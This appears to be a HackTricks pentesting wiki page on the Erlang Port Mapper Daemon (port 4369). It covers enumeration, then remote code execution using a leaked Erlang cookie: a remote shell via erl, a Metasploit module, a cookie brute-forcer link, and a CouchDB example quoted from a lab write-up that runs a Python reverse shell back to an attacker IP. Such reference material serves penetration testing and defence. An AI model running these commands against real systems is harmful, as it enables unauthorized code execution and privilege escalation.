4369-pentesting-erlang-port-mapper-daemon-epmd.md (4609B)
1 --- 2 title: "4369 Pentesting Erlang Port Mapper Daemon (epmd)" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 4369 Pentesting Erlang Port Mapper Daemon (epmd) 14 15 ## Basic Info 16 17 The **Erlang Port Mapper Daemon (epmd)** maps distributed Erlang node names to the TCP ports on which those nodes accept distribution connections. It does not map names to machine addresses and does not itself provide a remote shell.<sup>[[4]](#references)</sup> 18 19 **Default port**: 4369 20 21 ```text 22 PORT STATE SERVICE VERSION 23 4369/tcp open epmd Erlang Port Mapper Daemon 24 ``` 25 26 This is used by default on RabbitMQ and CouchDB installations. 27 28 ## Enumeration 29 30 ### Manual 31 32 The commands below use Erlang/OTP; official builds and source releases are available from the Erlang project.<sup>[[6]](#references)</sup> 33 34 ```bash 35 echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369 36 37 # Install Erlang/OTP from your distribution or the official downloads page 38 dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb 39 apt-get install erlang 40 erl #Once Erlang is installed this will promp an erlang terminal 41 1> net_adm:names('<HOST>'). #This will return the listen addresses 42 ``` 43 44 ### Automatic 45 46 ```bash 47 nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP> 48 49 PORT STATE SERVICE VERSION 50 4369/tcp open epmd Erlang Port Mapper Daemon 51 | epmd-info: 52 | epmd_port: 4369 53 | nodes: 54 | bigcouch: 11502 55 | freeswitch: 8031 56 | ecallmgr: 11501 57 | kazoo_apps: 11500 58 |_ kazoo-rabbitmq: 25672 59 ``` 60 61 ## Erlang Cookie RCE 62 63 ### Remote Connection 64 65 If an exposed distribution node accepts a leaked Erlang cookie, the holder can authenticate as a peer and may invoke powerful RPC functions, often leading to command execution with the node's OS privileges. The default user cookie is normally stored in `~/.erlang.cookie`; current runtimes generate a 20-character cookie when creating the file, but operators can set a different value or location.<sup>[[1]](#references)[[5]](#references)</sup> 66 67 ```bash 68 greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn 69 Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10] 70 71 Eshell V8.1 (abort with ^G) 72 73 At last, we can start an erlang shell on the remote system. 74 75 (test@target.fqdn)1>os:cmd("id"). 76 "uid=0(root) gid=0(root) groups=0(root)\n" 77 ``` 78 79 More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)<sup>[[1]](#references)</sup>\ 80 The author also share a program to brutforce the cookie: 81 82 [Epmd Bf 0.1.Tar.Bz2](epmd_bf-0.1.tar.bz2) 83 84 ### Local Connection 85 86 In this case we are going to abuse CouchDB to escalate privileges locally:<sup>[[2]](#references)</sup> 87 88 ```bash 89 HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE 90 (anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]). 91 "homer\n" 92 (anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]). 93 ``` 94 95 Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)<sup>[[3]](#references)</sup>\ 96 You can use **Canape HTB machine to** **practice** how to **exploit this vuln**. 97 98 ### Metasploit 99 100 ```bash 101 #Metasploit can also exploit this if you know the cookie 102 msf5> use exploit/multi/misc/erlang_cookie_rce 103 ``` 104 105 ## Shodan 106 107 - `port:4369 "at port"` 108 109 ## References 110 111 - [1] [Erlang distribution RCE and a cookie bruteforcer](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/) 112 - [2] [HTB: Canape](https://0xdf.gitlab.io/2018/09/15/htb-canape.html) 113 - [3] [2018/09](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) 114 - [4] [Erlang/OTP — EPMD protocol](https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html#epmd-protocol) 115 - [5] [Erlang/OTP — Distributed Erlang security](https://www.erlang.org/doc/system/distributed.html#security) 116 - [6] [Erlang/OTP downloads](https://www.erlang.org/downloads)